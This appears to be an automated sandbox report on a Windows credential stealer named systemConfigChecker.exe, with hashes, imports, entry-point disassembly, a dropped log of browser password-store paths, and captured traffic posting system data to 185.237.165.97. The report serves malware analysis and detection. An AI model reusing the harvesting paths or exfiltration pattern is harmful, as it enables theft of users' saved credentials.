        5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
        • 104.26.1.231
        2LKVPFub8Z.exeGet hashmaliciousSnake KeyloggerBrowse
        • 104.21.67.152
        file.exeGet hashmaliciousLummaC StealerBrowse
        • 104.21.16.9
        7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
        • 104.16.184.241
        kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
        • 172.67.74.152
        datXObAAn1.exeGet hashmaliciousDiscord RatBrowse
        • 162.159.133.234
        EeXJoO1J62.exeGet hashmaliciousDiscord RatBrowse
        • 162.159.130.234
        gcrY4QgzW9.exeGet hashmaliciousDiscord RatBrowse
        • 162.159.136.234
        No context
        No context
        Process:C:\Users\user\Desktop\systemConfigChecker.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):1020
        Entropy (8bit):4.868069397782046
        Encrypted:false
        SSDEEP:24:8p5Kk89L5K889LM89oYeb89LDWD899LkpLL+89mX6nck:8pUksLU8sLMsoDbsLDWDs5kdL+smX6n5
        MD5:DA5B9D57676E6E29F1A38B7A2629E35D
        SHA1:0C95B300725BBA5238A9D60DC7A88DAEDD0A0004
        SHA-256:56D2B959A284B37F3C2EC635CF79846D7F66CA43BD9613DAB2BC4659F296B866
        SHA-512:88CF5111968624181237B1A518376D6E5C2313C5B619F881A445309F34AA3CF00511DC0C986E81EC5FE6CE400A9AC12B49F8B1AC6DA8A3EFB208365E98A96CA9
        Malicious:false
        Reputation:low
        Preview:File is found: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data..File is found: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable\Login Data..File not found: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json..File is found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.json..?? ??????? ????????
        File type:PE32+ executable (console) x86-64, for MS Windows
        Entropy (8bit):5.9784256378182175
        TrID:
        • Win64 Executable Console (202006/5) 92.65%
        • Win64 Executable (generic) (12005/4) 5.51%
        • Generic Win/DOS Executable (2004/3) 0.92%
        • DOS Executable Generic (2002/1) 0.92%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:systemConfigChecker.exe
        File size:81'920 bytes
        MD5:218954f9dd70247e51af8a30940d5c33
        SHA1:35ee01d3128951c3993079186fddc9c0dbe155f7
        SHA256:95ec35703d323fe972a936d9b3574bb191e94b693656d94149897c5ff35f225f
        SHA512:335108a63a07d9d81240c40e67dc6375468bd5bae79edf413b0ec8913e43364b155fdebe0c972ab6150ae2c59779d75045108d9a257e2ce0b8c5ae78f819804e
        SSDEEP:1536:KRF3gVPu3b3X41IiaqGyB0+Hls+X7nTfRQP7K:yRE23zX41la+THls+m+
        TLSH:A2834947376A00ECD1ABA378D5A30A06D772BC05076193DF13A0A17A0FA67D1AE7FB51
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a...a...a.......a...b...a...e...a...d...a...`...a...`...a...`.r.a...h...a.......a...c...a.Rich..a........................
        Icon Hash:00928e8e8686b000
        Entrypoint:0x14000bae8
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x140000000
        Subsystem:windows cui
        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x6729C700 [Tue Nov 5 07:19:28 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:0
        File Version Major:6
        File Version Minor:0
        Subsystem Version Major:6
        Subsystem Version Minor:0
        Import Hash:066fb96ba163200488bf8cbd9705163e
        Instruction
        dec eax
        sub esp, 28h
        call 00007FBC4CAE1400h
        dec eax
        add esp, 28h
        jmp 00007FBC4CAE0BA7h
        int3
        int3
        retn 0000h
        int3
        inc eax
        push ebx
        dec eax
        sub esp, 20h
        dec eax
        mov ebx, ecx
        xor ecx, ecx
        call dword ptr [000025CFh]
        dec eax
        mov ecx, ebx
        call dword ptr [000025BEh]
        call dword ptr [000025C8h]
        dec eax
        mov ecx, eax
        mov edx, C0000409h
        dec eax
        add esp, 20h
        pop ebx
        dec eax
        jmp dword ptr [000025BCh]
        dec eax
        mov dword ptr [esp+08h], ecx
        dec eax
        sub esp, 38h
        mov ecx, 00000017h
        call dword ptr [000025B0h]
        test eax, eax
        je 00007FBC4CAE0D39h
        mov ecx, 00000002h
        int 29h
        dec eax
        lea ecx, dword ptr [00009D26h]
        call 00007FBC4CAE0DDEh
        dec eax
        mov eax, dword ptr [esp+38h]
        dec eax
        mov dword ptr [00009E0Dh], eax
        dec eax
        lea eax, dword ptr [esp+38h]
        dec eax
        add eax, 08h
        dec eax
        mov dword ptr [00009D9Dh], eax
        dec eax
        mov eax, dword ptr [00009DF6h]
        dec eax
        mov dword ptr [00009C67h], eax
        dec eax
        mov eax, dword ptr [esp+40h]
        dec eax
        mov dword ptr [00009D6Bh], eax
        mov dword ptr [00009C41h], C0000409h
        mov dword ptr [00009C3Bh], 00000001h
        mov dword ptr [00009C45h], 00000001h
        Programming Language:
        • [IMP] VS2008 SP1 build 30729
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x11ed40x154.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x1e0.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x160000x9f0.pdata
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x10c.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0xf7b00x70.rdata
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf6700x140.rdata
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0xe0000x630.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000xc0770xc200bb167b742e9c1e46cecec9663ad94a6eFalse0.48012644974226804DIY-Thermocam raw data (Lepton 3.x), scale -14592-0, spot sensor temperature -0.000048, unit celsius, color scheme 0, calibration: offset 262144.000000, slope 171778.0468756.1463104557320865IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0xe0000x62400x6400a9c91b7191e54302f31a2135cbaafa16False0.3462109375data4.930625889732141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x150000xda00x800f49b7b400b3a9a593e0463969e69304eFalse0.19775390625DOS executable (block device driver)3.6357853761384584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .pdata0x160000x9f00xa005859a68e779cdab4bed9be7147961d7cFalse0.493359375data4.82362794619983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .rsrc0x170000x1e00x2002c9bc3c453765c5a8e37ea178e81aa1bFalse0.52734375data4.710061382693063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0x180000x10c0x2009549c1cc6ee8d55da6140afe18223169False0.42578125data3.2295190100213778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_MANIFEST0x170600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
        DLLImport
        KERNEL32.dllGetFileAttributesW, GetLocaleInfoA, OpenProcess, GetTimeZoneInformation, GetLastError, CloseHandle, K32GetModuleBaseNameA, GetSystemInfo, K32EnumProcesses, GlobalMemoryStatusEx, GetConsoleWindow, K32EnumProcessModules, GetDiskFreeSpaceExA, FindClose, InitializeSListHead, GetSystemTimeAsFileTime, GetEnvironmentVariableW, FindNextFileW, FindFirstFileW, GetLogicalDrives, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, RtlLookupFunctionEntry, GetModuleFileNameA, GetCurrentThreadId, RtlCaptureContext
        USER32.dllShowWindow
        ADVAPI32.dllRegGetValueA, RegCloseKey, RegOpenKeyExA
        MSVCP140.dll?id@?$codecvt@_WDU_Mbstatet@@@std@@2V0locale@2@A, ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAA_JPEB_W_J@Z, ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z, ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z, ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z, ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAPEAV12@PEAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAXAEBVlocale@2@@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z, ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z, ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ, ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?good@ios_base@std@@QEBA_NXZ, ??7ios_base@std@@QEBA_NXZ, ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA@XZ, ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z, ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD@Z, ?in@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEA_W3AEAPEA_W@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z, ?_Decref@facet@locale@std@@UEAAPEAV_Facet_base@3@XZ, ?_Incref@facet@locale@std@@UEAAXXZ, ??Bid@locale@std@@QEAA_KXZ, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??0_Lockit@std@@QEAA@H@Z, ??1_Lockit@std@@QEAA@XZ, ?_Xlength_error@std@@YAXPEBD@Z
        IPHLPAPI.DLLGetAdaptersInfo
        NETAPI32.dllNetApiBufferFree, NetUserEnum, NetGetJoinInformation
        WINHTTP.dllWinHttpQueryDataAvailable, WinHttpConnect, WinHttpSendRequest, WinHttpCloseHandle, WinHttpOpenRequest, WinHttpReadData, WinHttpQueryHeaders, WinHttpOpen, WinHttpReceiveResponse
        VCRUNTIME140_1.dll__CxxFrameHandler4
        VCRUNTIME140.dll__C_specific_handler, _CxxThrowException, memset, __current_exception, __std_terminate, __std_exception_copy, memcpy, memcmp, memchr, memmove, __current_exception_context, __std_exception_destroy
        api-ms-win-crt-stdio-l1-1-0.dllfread, fsetpos, ungetc, _fseeki64, _get_stream_buffer_pointers, setvbuf, fgetpos, fwrite, fflush, __p__commode, fputc, fgetc, fclose, _set_fmode
        api-ms-win-crt-heap-l1-1-0.dllfree, malloc, _set_new_mode, _callnewh
        api-ms-win-crt-string-l1-1-0.dllisalnum
        api-ms-win-crt-filesystem-l1-1-0.dll_lock_file, _unlock_file
        api-ms-win-crt-runtime-l1-1-0.dll_get_initial_narrow_environment, _initterm, _initterm_e, _cexit, _exit, __p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _crt_atexit, _register_onexit_function, _seh_filter_exe, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, _set_app_type, exit, terminate, _invalid_parameter_noinfo_noreturn
        api-ms-win-crt-math-l1-1-0.dll__setusermatherr
        api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States
        TimestampSource PortDest PortSource IPDest IP
        Dec 6, 2024 10:58:49.447566986 CET4970080192.168.2.7172.67.74.152
        Dec 6, 2024 10:58:49.567533016 CET8049700172.67.74.152192.168.2.7
        Dec 6, 2024 10:58:49.567622900 CET4970080192.168.2.7172.67.74.152
        Dec 6, 2024 10:58:49.567924976 CET4970080192.168.2.7172.67.74.152
        Dec 6, 2024 10:58:49.687644005 CET8049700172.67.74.152192.168.2.7
        Dec 6, 2024 10:58:50.664830923 CET8049700172.67.74.152192.168.2.7
        Dec 6, 2024 10:58:50.714219093 CET4970080192.168.2.7172.67.74.152
        Dec 6, 2024 10:58:51.341677904 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.464106083 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.464201927 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.464443922 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.464538097 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.584963083 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585016012 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585037947 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.585046053 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585076094 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.585113049 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.585120916 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585150003 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585171938 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.585189104 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585206985 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.585237980 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.585256100 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585304022 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585306883 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.585362911 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.585401058 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585427999 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.585485935 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.705322027 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.705358028 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.705398083 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.705411911 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.705454111 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.705492020 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.705504894 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.705539942 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.705559969 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.705573082 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.705625057 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.748625040 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.748773098 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.868664980 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:51.868748903 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:51.912614107 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:52.032602072 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:52.032655001 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:52.240596056 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:52.240686893 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:52.488708019 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:52.488903999 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:52.854886055 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:52.867866993 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:52.867923975 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:52.977538109 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:53.036657095 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:53.036854982 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:53.240983009 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:53.243292093 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:53.488629103 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:53.488722086 CET4970180192.168.2.7185.237.165.97
        Dec 6, 2024 10:58:53.604432106 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:58:53.609297991 CET8049701185.237.165.97192.168.2.7
        Dec 6, 2024 10:59:20.824614048 CET4970080192.168.2.7172.67.74.152
        TimestampSource PortDest PortSource IPDest IP
        Dec 6, 2024 10:58:49.303191900 CET5835653192.168.2.71.1.1.1
        Dec 6, 2024 10:58:49.440721035 CET53583561.1.1.1192.168.2.7
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Dec 6, 2024 10:58:49.303191900 CET192.168.2.71.1.1.10x7cbcStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Dec 6, 2024 10:58:49.440721035 CET1.1.1.1192.168.2.70x7cbcNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
        Dec 6, 2024 10:58:49.440721035 CET1.1.1.1192.168.2.70x7cbcNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
        Dec 6, 2024 10:58:49.440721035 CET1.1.1.1192.168.2.70x7cbcNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
        • api.ipify.org
        • 185.237.165.97
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.749700172.67.74.152806176C:\Users\user\Desktop\systemConfigChecker.exe
        TimestampBytes transferredDirectionData
        Dec 6, 2024 10:58:49.567924976 CET88OUTGET / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: WinHTTP/1.0
        Host: api.ipify.org
        Dec 6, 2024 10:58:50.664830923 CET429INHTTP/1.1 200 OK
        Date: Fri, 06 Dec 2024 09:58:50 GMT
        Content-Type: text/plain
        Content-Length: 12
        Connection: keep-alive
        Vary: Origin
        CF-Cache-Status: DYNAMIC
        Server: cloudflare
        CF-RAY: 8edb6b757b5d4394-EWR
        server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1646&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
        Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
        Data Ascii: 8.46.123.228


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.749701185.237.165.97806176C:\Users\user\Desktop\systemConfigChecker.exe
        TimestampBytes transferredDirectionData
        Dec 6, 2024 10:58:51.464443922 CET185OUTPOST /userdata HTTP/1.1
        Connection: Keep-Alive
        Content-Type: multipart/form-data; boundary=WebKitFormBoundary
        User-Agent: WinHTTP/1.0
        Content-Length: 96727
        Host: 185.237.165.97
        Dec 6, 2024 10:58:51.464538097 CET11124OUTData Raw: 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 79 73 69 6e 66 6f 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
        Data Ascii: --WebKitFormBoundaryContent-Disposition: form-data; name="sysinfo"Content-Type: application/json{ "sysinfo": "MACHINE%20INFO%3a%0aMachine%20name%3a%20440BX%20Desktop%20Reference%20Platform%0aProcessor%20name%3a%20Intel%28R%29%20Core%28
        Dec 6, 2024 10:58:51.585037947 CET1236OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Dec 6, 2024 10:58:51.585076094 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Dec 6, 2024 10:58:51.585113049 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Dec 6, 2024 10:58:51.585171938 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Dec 6, 2024 10:58:51.585206985 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Dec 6, 2024 10:58:51.585237980 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
        Dec 6, 2024 10:58:51.585306883 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii:
